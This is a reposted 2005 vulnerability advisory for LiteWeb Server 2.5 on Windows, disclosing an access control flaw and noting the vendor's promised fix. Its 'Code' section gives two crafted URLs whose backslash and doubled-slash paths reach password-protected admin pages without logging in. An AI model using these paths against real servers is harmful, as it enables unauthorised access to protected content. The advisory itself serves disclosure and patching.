[转载]LiteWeb允许远程用户访问受限制页面

文章作者：gss_it@yahoo.com

Application: LiteWeb Server
Web Site: www.cmfperception.com
Versions: 2.5
Platform: Windows

Bug: An access control vulnerability.

Credits:
########

#########################################
# == Ziv Kamir == #
# #
# GSSIT - Global Security Solution IT #
# #
# Email : gss_it@yahoo.com #
# #
# Web : www.gssit.co.il #
# #
#########################################

---------------------

1) Introduction
2) Bug
3) The Code
4) Fix


================
1) Introduction
================

LiteWeb is a powerful web server that handles multiple domains
and supports PHP, Perl, MySQL, and much more.


=======
2) Bug
=======

A remote user may obtain password-protected files on the server without having to authenticate.


===========
3) The Code
===========

http://Target/\admin\/login.html

http://Target//admin//login.html


======
4) Fix
======

Date of Vendor Notification:
----------------------------

02/06/05


Response:
---------

02/06/05

It will be fixed in the next version.